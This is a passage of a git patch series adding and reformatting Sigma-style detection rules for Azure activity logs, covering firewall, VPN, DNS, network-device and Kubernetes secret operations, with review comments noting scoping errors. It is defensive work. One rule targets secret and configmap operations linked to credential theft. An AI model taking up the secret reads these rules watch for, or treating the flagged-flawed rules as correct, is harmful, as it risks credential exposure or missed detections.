+ - MICROSOFT.NETWORK/AZUREFIREWALLS/NETWORKRULECOLLECTIONS/DELETE
+ condition: selection
+level: medium
+tags:
+ - attack.impact
+falsepositives:
+ - Rule Collections (Application, NAT, and Network) being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
+ - Rule Collections (Application, NAT, and Network) modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
From 038011a1d52f198444dded3096e0ee55d80d0e73 Mon Sep 17 00:00:00 2001
From: Austin Songer Date: Sun, 8 Aug 2021 22:46:03 -0500 Subject: [PATCH 0243/1367] Create azure_network_firewall_rule_modified_or_deleted.yml --- ...work_firewall_rule_modified_or_deleted.yml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/cloud/azure_network_firewall_rule_modified_or_deleted.yml
diff --git a/rules/cloud/azure_network_firewall_rule_modified_or_deleted.yml b/rules/cloud/azure_network_firewall_rule_modified_or_deleted.yml new file mode 100644
index 00000000..809516ce
--- /dev/null
+++ b/rules/cloud/azure_network_firewall_rule_modified_or_deleted.yml
@@ -0,0 +1,24 @@
+title: Azure Firewall Rule Configuration Modified or Deleted
+id: 2a7d64cf-81fa-4daf-ab1b-ab80b789c067
+description: Identifies when a Firewall Rule Configuration is Modified or Deleted.
+author: Austin Songer
+status: experimental
+date: 2021/
+references:
+ - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
+logsource:
+ service: azure.activitylogs
+detection:
+ selection:
+ properties.message:
+ - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULECOLLECTIONGROUPS/WRITE
+ - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULECOLLECTIONGROUPS/DELETE
+ - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULEGROUPS/WRITE
+ - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULEGROUPS/DELETE
+ condition: selection
+level: medium
+tags:
+ - attack.impact
+falsepositives:
+ - Firewall Rule Configuration being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
+ - Firewall Rule Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
From 6f72c46bba159b9a67e53a92257527d6ec11d475 Mon Sep 17 00:00:00 2001
From: Austin Songer Date: Sun, 8 Aug 2021 22:47:35 -0500 Subject: [PATCH 0244/1367] Create azure_network_p2s_vpn_modified_or_deleted.yml --- ...re_network_p2s_vpn_modified_or_deleted.yml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 rules/cloud/azure_network_p2s_vpn_modified_or_deleted.yml
diff --git a/rules/cloud/azure_network_p2s_vpn_modified_or_deleted.yml b/rules/cloud/azure_network_p2s_vpn_modified_or_deleted.yml new file mode 100644
index 00000000..dc61f6be
--- /dev/null
+++ b/rules/cloud/azure_network_p2s_vpn_modified_or_deleted.yml
@@ -0,0 +1,22 @@
+title: Azure Point-to-site VPN Modified or Deleted
+id: d9557b75-267b-4b43-922f-a775e2d1f792
+description: Identifies when a Point-to-site VPN is Modified or Deleted.
+author: Austin Songer
+status: experimental
+date: 2021/
+references:
+ - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
+logsource:
+ service: azure.activitylogs
+detection:
+ selection:
+ properties.message:
+ - MICROSOFT.NETWORK/P2SVPNGATEWAYS/WRITE
+ - MICROSOFT.NETWORK/P2SVPNGATEWAYS/DELETE
+ condition: selection
+level: medium
+tags:
+ - attack.impact
+falsepositives:
+ - Point-to-site VPN being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
+ - Point-to-site VPN modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
From 89197b1782b44a6e759aa5b70ef955116ee1f397 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 22:49:39 -0500 Subject: [PATCH 0245/1367] Create azure_network_security_modified_or_deleted.yml --- ...e_network_security_modified_or_deleted.yml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/cloud/azure_network_security_modified_or_deleted.yml
diff --git a/rules/cloud/azure_network_security_modified_or_deleted.yml b/rules/cloud/azure_network_security_modified_or_deleted.yml new file mode 100644
index 00000000..3a1220ae
--- /dev/null
+++ b/rules/cloud/azure_network_security_modified_or_deleted.yml
@@ -0,0 +1,24 @@
+title: Azure Network Security Configuration Modified or Deleted
+id: d22b4df4-5a67-4859-a578-8c9a0b5af9df
+description: Identifies when a network security configuration is modified or deleted.
+author: Austin Songer
+status: experimental
+date: 2021/08/08
+references:
+ - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
+logsource:
+ service: azure.activitylogs
+detection:
+ selection:
+ properties.message:
+ - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/WRITE
+ - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/DELETE
+ - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/SECURITYRULES/WRITE
+ - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/SECURITYRULES/DELETE
+ condition: selection
+level: medium
+tags:
+ - attack.impact
+falsepositives:
+ - Network Security Configuration being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
+ - Network Security Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
From b9f84bedc55609d7c195ba53e13617ecbfc2aec1 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 22:52:15 -0500 Subject: [PATCH 0246/1367] Create azure_network_virtual_device_modified_or_deleted.yml --- ...ork_virtual_device_modified_or_deleted.yml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 rules/cloud/azure_network_virtual_device_modified_or_deleted.yml
diff --git a/rules/cloud/azure_network_virtual_device_modified_or_deleted.yml b/rules/cloud/azure_network_virtual_device_modified_or_deleted.yml new file mode 100644
index 00000000..85027a0b
--- /dev/null
+++ b/rules/cloud/azure_network_virtual_device_modified_or_deleted.yml
@@ -0,0 +1,29 @@
+title: Azure Virtual Network Device Modified or Deleted
+id: 15ef3fac-f0f0-4dc4-ada0-660aa72980b3
+description: Identifies when a virtual network device is being modified or deleted. This can be a network interface, network virtual applicance, vitual hub, or virtual router.
+author: Austin Songer
+status: experimental
+date: 2021/08/08
+references:
+ - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
+logsource:
+ service: azure.activitylogs
+detection:
+ selection:
+ properties.message:
+ - MICROSOFT.NETWORK/NETWORKINTERFACES/WRITE
+ - MICROSOFT.NETWORK/NETWORKINTERFACES/JOIN/ACTION
+ - MICROSOFT.NETWORK/NETWORKINTERFACES/DELETE
+ - MICROSOFT.NETWORK/NETWORKVIRTUALAPPLIANCES/DELETE
+ - MICROSOFT.NETWORK/NETWORKVIRTUALAPPLIANCES/WRITE
+ - MICROSOFT.NETWORK/VIRTUALHUBS/DELETE
+ - MICROSOFT.NETWORK/VIRTUALHUBS/WRITE
+ - MICROSOFT.NETWORK/VIRTUALROUTERS/WRITE
+ - MICROSOFT.NETWORK/VIRTUALROUTERS/DELETE
+ condition: selection
+level: medium
+tags:
+ - attack.impact
+falsepositives:
+ - Virtual Network Device being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
+ - Virtual Network Device modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
From f519ec70ecf23938075c01dd7742ebf5fa78a810 Mon Sep 17 00:00:00 2001
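Review bot: `- MICROSOFT.NETWORK/NETWORKINTERFACES/JOIN/ACTION` is not a modification or deletion of the interface — as far as I know it is the join permission exercised whenever another resource (typically a VM) is attached to the NIC, so it will fire on every ordinary VM deployment and does not belong in a rule titled "Modified or Deleted"; drop it, or give it a separate lower-severity rule if NIC attachment is of interest. Every `/WRITE` entry here also matches creation, which the description should say so the `falsepositives` expectation of "system administrator" changes is set correctly. The description has two typos: `applicance` should be `appliance` and `vitual` should be `virtual`.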
From: Austin Songer Date: Sun, 8 Aug 2021 22:58:00 -0500 Subject: [PATCH 0247/1367] Update azure_dns_zone_modified_or_deleted.yml --- rules/cloud/azure_dns_zone_modified_or_deleted.yml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/rules/cloud/azure_dns_zone_modified_or_deleted.yml b/rules/cloud/azure_dns_zone_modified_or_deleted.yml index e5c547be..8497bf20 100644 --- a/rules/cloud/azure_dns_zone_modified_or_deleted.yml +++ b/rules/cloud/azure_dns_zone_modified_or_deleted.yml @@ -3,7 +3,7 @@ id: af6925b0-8826-47f1-9324-337507a0babd description: Identifies when DNS zone is modified or deleted. author: Austin Songer status: experimental -date: 2021/08/07 +date: 2021/08/08 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes logsource: @@ -37,7 +37,6 @@ detection: level: medium tags: - attack.impact - - attack.credential_access falsepositives: - DNS zone modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - DNS zone modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 57cc54b4e6b6ed8cc8e1faab3c735d15a4ed5a8c Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 22:58:26 -0500 Subject: [PATCH 0248/1367] Update azure_virtual_network_modified_or_deleted.yml --- rules/cloud/azure_virtual_network_modified_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/azure_virtual_network_modified_or_deleted.yml b/rules/cloud/azure_virtual_network_modified_or_deleted.yml index ab700f89..fd261ea6 100644 --- a/rules/cloud/azure_virtual_network_modified_or_deleted.yml +++ b/rules/cloud/azure_virtual_network_modified_or_deleted.yml 
@@ -13,7 +13,7 @@ detection: properties.message: - MICROSOFT.NETWORK/VIRTUALNETWORKGATEWAYS/WRITE - MICROSOFT.NETWORK/VIRTUALNETWORKGATEWAYS/DELETE - - MICROSOFT.NETWORK/VIRTUALNETWORKS/WRITE + - MICROSOFT.NETWORK/VIRTUALNETWORKS/WRITE - MICROSOFT.NETWORK/VIRTUALNETWORKS/DELETE condition: selection level: medium From de405479d2a8269657874f9e6eb979db112451f4 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 22:59:42 -0500 Subject: [PATCH 0249/1367] Update azure_network_virtual_device_modified_or_deleted.yml --- .../cloud/azure_network_virtual_device_modified_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/azure_network_virtual_device_modified_or_deleted.yml b/rules/cloud/azure_network_virtual_device_modified_or_deleted.yml index 85027a0b..5a5ec909 100644 --- a/rules/cloud/azure_network_virtual_device_modified_or_deleted.yml +++ b/rules/cloud/azure_network_virtual_device_modified_or_deleted.yml @@ -10,7 +10,7 @@ logsource: service: azure.activitylogs detection: selection: - properties.message: + properties.message: - MICROSOFT.NETWORK/NETWORKINTERFACES/WRITE - MICROSOFT.NETWORK/NETWORKINTERFACES/JOIN/ACTION - MICROSOFT.NETWORK/NETWORKINTERFACES/DELETE From d99f1ed60a209711cd05b5c7db449d1695ccbd45 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 23:00:06 -0500 Subject: [PATCH 0250/1367] Update azure_network_security_modified_or_deleted.yml --- rules/cloud/azure_network_security_modified_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/azure_network_security_modified_or_deleted.yml b/rules/cloud/azure_network_security_modified_or_deleted.yml index 3a1220ae..1c62b1e1 100644 --- a/rules/cloud/azure_network_security_modified_or_deleted.yml +++ b/rules/cloud/azure_network_security_modified_or_deleted.yml 
@@ -10,7 +10,7 @@ logsource: service: azure.activitylogs detection: selection: - properties.message: + properties.message: - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/WRITE - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/DELETE - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/SECURITYRULES/WRITE From 688a531e6e3cf709d00240bf348a9dd8e5453aa8 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 23:00:25 -0500 Subject: [PATCH 0251/1367] Update azure_network_p2s_vpn_modified_or_deleted.yml --- rules/cloud/azure_network_p2s_vpn_modified_or_deleted.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/cloud/azure_network_p2s_vpn_modified_or_deleted.yml b/rules/cloud/azure_network_p2s_vpn_modified_or_deleted.yml index dc61f6be..d65d147d 100644 --- a/rules/cloud/azure_network_p2s_vpn_modified_or_deleted.yml +++ b/rules/cloud/azure_network_p2s_vpn_modified_or_deleted.yml @@ -3,14 +3,14 @@ id: d9557b75-267b-4b43-922f-a775e2d1f792 description: Identifies when a Point-to-site VPN is Modified or Deleted. author: Austin Songer status: experimental -date: 2021/ +date: 2021/08/08 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations logsource: service: azure.activitylogs detection: selection: - properties.message: + properties.message: - MICROSOFT.NETWORK/P2SVPNGATEWAYS/WRITE - MICROSOFT.NETWORK/P2SVPNGATEWAYS/DELETE condition: selection From bed03b324cf9b033a49de77763f61fb35696f64a Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 23:00:43 -0500 Subject: [PATCH 0252/1367] Update azure_vpn_connection_modified_or_deleted.yml --- rules/cloud/azure_vpn_connection_modified_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/azure_vpn_connection_modified_or_deleted.yml b/rules/cloud/azure_vpn_connection_modified_or_deleted.yml index d41326fd..57880f26 100644 --- a/rules/cloud/azure_vpn_connection_modified_or_deleted.yml 
+++ b/rules/cloud/azure_vpn_connection_modified_or_deleted.yml @@ -10,7 +10,7 @@ logsource: service: azure.activitylogs detection: selection: - properties.message: + properties.message: - MICROSOFT.NETWORK/VPNGATEWAYS/VPNCONNECTIONS/WRITE - MICROSOFT.NETWORK/VPNGATEWAYS/VPNCONNECTIONS/DELETE condition: selection From 47a1ff2b96b02d70b9ca91c776db854a419ffc73 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 23:01:19 -0500 Subject: [PATCH 0253/1367] Update azure_network_firewall_rule_modified_or_deleted.yml --- .../cloud/azure_network_firewall_rule_modified_or_deleted.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/cloud/azure_network_firewall_rule_modified_or_deleted.yml b/rules/cloud/azure_network_firewall_rule_modified_or_deleted.yml index 809516ce..bb6a7780 100644 --- a/rules/cloud/azure_network_firewall_rule_modified_or_deleted.yml +++ b/rules/cloud/azure_network_firewall_rule_modified_or_deleted.yml @@ -3,14 +3,14 @@ id: 2a7d64cf-81fa-4daf-ab1b-ab80b789c067 description: Identifies when a Firewall Rule Configuration is Modified or Deleted. author: Austin Songer status: experimental -date: 2021/ +date: 2021/08/08 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations logsource: service: azure.activitylogs detection: selection: - properties.message: + properties.message: - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULECOLLECTIONGROUPS/WRITE - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULECOLLECTIONGROUPS/DELETE - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULEGROUPS/WRITE From ca115863eee54e922f45f5252d2e60a6ccfbb382 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 23:01:43 -0500 Subject: [PATCH 0254/1367] Update azure_dns_zone_modified_or_deleted.yml --- rules/cloud/azure_dns_zone_modified_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/rules/cloud/azure_dns_zone_modified_or_deleted.yml b/rules/cloud/azure_dns_zone_modified_or_deleted.yml index 8497bf20..ea3ce8a2 100644 --- a/rules/cloud/azure_dns_zone_modified_or_deleted.yml +++ b/rules/cloud/azure_dns_zone_modified_or_deleted.yml @@ -10,7 +10,7 @@ logsource: service: azure.activitylogs detection: selection: - properties.message: + properties.message: - MICROSOFT.NETWORK/DNSZONES/WRITE - MICROSOFT.NETWORK/DNSZONES/DELETE - MICROSOFT.NETWORK/DNSZONES/A/WRITE From 7a1f2c317aa1e969c380d019094a698fd8f23686 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 23:02:42 -0500 Subject: [PATCH 0255/1367] Update azure_network_firewall_rule_modified_or_deleted.yml --- rules/cloud/azure_network_firewall_rule_modified_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/azure_network_firewall_rule_modified_or_deleted.yml b/rules/cloud/azure_network_firewall_rule_modified_or_deleted.yml index bb6a7780..af6398a9 100644 --- a/rules/cloud/azure_network_firewall_rule_modified_or_deleted.yml +++ b/rules/cloud/azure_network_firewall_rule_modified_or_deleted.yml @@ -11,7 +11,7 @@ logsource: detection: selection: properties.message: - - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULECOLLECTIONGROUPS/WRITE + - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULECOLLECTIONGROUPS/WRITE - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULECOLLECTIONGROUPS/DELETE - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULEGROUPS/WRITE - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULEGROUPS/DELETE From 7393bde27995012dd0cd4872be4ea538dd39308c Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 23:03:43 -0500 Subject: [PATCH 0256/1367] Update azure_dns_zone_modified_or_deleted.yml --- .../azure_dns_zone_modified_or_deleted.yml | 38 +++++++++---------- 1 file changed, 19 insertions(+), 19 deletions(-) diff --git a/rules/cloud/azure_dns_zone_modified_or_deleted.yml b/rules/cloud/azure_dns_zone_modified_or_deleted.yml index ea3ce8a2..db8e8c52 100644 
--- a/rules/cloud/azure_dns_zone_modified_or_deleted.yml +++ b/rules/cloud/azure_dns_zone_modified_or_deleted.yml @@ -12,27 +12,27 @@ detection: selection: properties.message: - MICROSOFT.NETWORK/DNSZONES/WRITE - - MICROSOFT.NETWORK/DNSZONES/DELETE - - MICROSOFT.NETWORK/DNSZONES/A/WRITE - - MICROSOFT.NETWORK/DNSZONES/A/DELETE - - MICROSOFT.NETWORK/DNSZONES/AAAA/WRITE - - MICROSOFT.NETWORK/DNSZONES/AAAA/DELETE - - MICROSOFT.NETWORK/DNSZONES/CAA/READ - - MICROSOFT.NETWORK/DNSZONES/CAA/WRITE - - MICROSOFT.NETWORK/DNSZONES/CAA/DELETE - - MICROSOFT.NETWORK/DNSZONES/CNAME/WRITE - - MICROSOFT.NETWORK/DNSZONES/CNAME/DELETE - - MICROSOFT.NETWORK/DNSZONES/MX/WRITE + - MICROSOFT.NETWORK/DNSZONES/DELETE + - MICROSOFT.NETWORK/DNSZONES/A/WRITE + - MICROSOFT.NETWORK/DNSZONES/A/DELETE + - MICROSOFT.NETWORK/DNSZONES/AAAA/WRITE + - MICROSOFT.NETWORK/DNSZONES/AAAA/DELETE + - MICROSOFT.NETWORK/DNSZONES/CAA/READ + - MICROSOFT.NETWORK/DNSZONES/CAA/WRITE + - MICROSOFT.NETWORK/DNSZONES/CAA/DELETE + - MICROSOFT.NETWORK/DNSZONES/CNAME/WRITE + - MICROSOFT.NETWORK/DNSZONES/CNAME/DELETE + - MICROSOFT.NETWORK/DNSZONES/MX/WRITE - MICROSOFT.NETWORK/DNSZONES/MX/DELETE - - MICROSOFT.NETWORK/DNSZONES/NS/WRITE + - MICROSOFT.NETWORK/DNSZONES/NS/WRITE - MICROSOFT.NETWORK/DNSZONES/NS/DELETE - - MICROSOFT.NETWORK/DNSZONES/PTR/WRITE - - MICROSOFT.NETWORK/DNSZONES/PTR/DELETE - - MICROSOFT.NETWORK/DNSZONES/SOA/WRITE - - MICROSOFT.NETWORK/DNSZONES/SRV/WRITE - - MICROSOFT.NETWORK/DNSZONES/SRV/DELETE - - MICROSOFT.NETWORK/DNSZONES/TXT/WRITE - - MICROSOFT.NETWORK/DNSZONES/TXT/DELETE + - MICROSOFT.NETWORK/DNSZONES/PTR/WRITE + - MICROSOFT.NETWORK/DNSZONES/PTR/DELETE + - MICROSOFT.NETWORK/DNSZONES/SOA/WRITE + - MICROSOFT.NETWORK/DNSZONES/SRV/WRITE + - MICROSOFT.NETWORK/DNSZONES/SRV/DELETE + - MICROSOFT.NETWORK/DNSZONES/TXT/WRITE + - MICROSOFT.NETWORK/DNSZONES/TXT/DELETE condition: selection level: medium tags: From cecabddac36d6f35c230d0b95eace8eae8e93041 Mon Sep 17 00:00:00 2001 
From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 9 Aug 2021 08:28:42 +0200 Subject: [PATCH 0257/1367] formatting falsepositives --- .../azure_kubernetes_rolebinding_modified_or_deleted.yml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/rules/cloud/azure_kubernetes_rolebinding_modified_or_deleted.yml b/rules/cloud/azure_kubernetes_rolebinding_modified_or_deleted.yml index f805aadf..8ab5492e 100644 --- a/rules/cloud/azure_kubernetes_rolebinding_modified_or_deleted.yml +++ b/rules/cloud/azure_kubernetes_rolebinding_modified_or_deleted.yml @@ -25,7 +25,6 @@ tags: - attack.impact - attack.credential_access falsepositives: - - RoleBinding/ClusterRoleBinding being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. RoleBinding/ClusterRoleBinding modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. - - + - RoleBinding/ClusterRoleBinding being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - RoleBinding/ClusterRoleBinding modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 6989174e4b31871058f98f04c4b9e5b5a2512883 Mon Sep 17 00:00:00 2001 
From: Austin Songer Date: Mon, 9 Aug 2021 01:29:42 -0500 Subject: [PATCH 0258/1367] azure_kubernetes_secret_or_config_object_access.yml (#1790) * Create azure_kubernetes_secret_or_config_object_access.yml * Delete azure_kubernetes_secret_or_config_object_access.yml * Create azure_kubernetes_secret_or_config_object_access.yml * Update azure_kubernetes_secret_or_config_object_access.yml * Update azure_kubernetes_secret_or_config_object_access.yml * Update azure_kubernetes_secret_or_config_object_access.yml Co-authored-by: frack113 <62423083+frack113@users.noreply.github.com> --- ...ernetes_secret_or_config_object_access.yml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 rules/cloud/azure_kubernetes_secret_or_config_object_access.yml diff --git a/rules/cloud/azure_kubernetes_secret_or_config_object_access.yml b/rules/cloud/azure_kubernetes_secret_or_config_object_access.yml new file mode 100644 index 00000000..7fa6cbb9 --- /dev/null +++ b/rules/cloud/azure_kubernetes_secret_or_config_object_access.yml 
@@ -0,0 +1,27 @@ +title: Azure Kubernetes Secret or Config Object Access +id: 7ee0b4aa-d8d4-4088-b661-20efdf41a04c +description: Identifies when a Kubernetes account access a sensitve objects such as configmaps or secrets. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/07 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes + - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/ + - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ + - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1 + - https://attack.mitre.org/matrices/enterprise/cloud/ +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/CONFIGMAPS/WRITE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/CONFIGMAPS/DELETE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SECRETS/WRITE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SECRETS/DELETE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Sensitive objects may be accessed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Sensitive objects accessed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From a333aa526ce15b1ca931f6b827cbcc6e40445b16 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 9 Aug 2021 08:30:52 +0200 Subject: [PATCH 0259/1367] formatting falsepositives --- rules/cloud/azure_container_registry_created_or_deleted.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) 
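Review bot: The title and description speak of secret or config object *access*, but the selection only lists `.../CONFIGMAPS/WRITE`, `.../CONFIGMAPS/DELETE`, `.../SECRETS/WRITE` and `.../SECRETS/DELETE`, so a principal reading secrets, the case that matters for credential theft, is never matched; either add the corresponding read operations if the activity log actually records them, or retitle the rule "Azure Kubernetes Secret or Config Object Modified or Deleted" and fix the description to `Identifies when a Kubernetes account modifies or deletes sensitive objects such as configmaps or secrets.` (which also corrects the "sensitve"/"access a" typos). The `MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/*` operations belong, as far as I know, to the Azure Arc-enabled Kubernetes provider rather than to AKS (`Microsoft.ContainerService/managedClusters`), so the description should say that AKS clusters are out of scope or the AKS operations should be added. With only write/delete operations the `attack.impact` tag is defensible; `attack.credential_access` would apply only once read operations are included.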
diff --git a/rules/cloud/azure_container_registry_created_or_deleted.yml b/rules/cloud/azure_container_registry_created_or_deleted.yml index 4b8897bb..661b25dc 100644 --- a/rules/cloud/azure_container_registry_created_or_deleted.yml +++ b/rules/cloud/azure_container_registry_created_or_deleted.yml @@ -22,4 +22,5 @@ level: low tags: - attack.impact falsepositives: - - Container Registry being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Container Registry created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Container Registry being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Container Registry created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 5158bda8ac8beeab6a8d4aa6c9e7b8a43a4906ec Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 9 Aug 2021 08:52:50 +0200 Subject: [PATCH 0260/1367] formatting falsepositives --- .../azure_kubernetes_service_account_modified_or_deleted.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/cloud/azure_kubernetes_service_account_modified_or_deleted.yml b/rules/cloud/azure_kubernetes_service_account_modified_or_deleted.yml index 2e89711e..891bb4c1 100644 --- a/rules/cloud/azure_kubernetes_service_account_modified_or_deleted.yml +++ b/rules/cloud/azure_kubernetes_service_account_modified_or_deleted.yml 
@@ -23,4 +23,5 @@ level: medium tags: - attack.impact falsepositives: - - Service account being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Service account modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Service account being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Service account modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From d66230206570fd07c37f0d956aa2c46fb9b6f808 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 9 Aug 2021 09:26:04 +0200 Subject: [PATCH 0261/1367] formatting falsepositives --- rules/cloud/azure_kubernetes_cluster_created_or_deleted.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/cloud/azure_kubernetes_cluster_created_or_deleted.yml b/rules/cloud/azure_kubernetes_cluster_created_or_deleted.yml index ee76990b..401ddb65 100644 --- a/rules/cloud/azure_kubernetes_cluster_created_or_deleted.yml +++ b/rules/cloud/azure_kubernetes_cluster_created_or_deleted.yml 
@@ -22,5 +22,6 @@ level: low tags: - attack.impact falsepositives: - - Kubernetes cluster being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Kubernetes cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Kubernetes cluster being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Kubernetes cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From f63b4147cea7cd7e72683a1dc6abb012ed136caa Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 9 Aug 2021 10:06:31 +0200 Subject: [PATCH 0262/1367] formatting falsepositives --- rules/cloud/azure_kubernetes_role_access.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/cloud/azure_kubernetes_role_access.yml b/rules/cloud/azure_kubernetes_role_access.yml index 553711ec..74b5c4ae 100644 --- a/rules/cloud/azure_kubernetes_role_access.yml +++ b/rules/cloud/azure_kubernetes_role_access.yml 
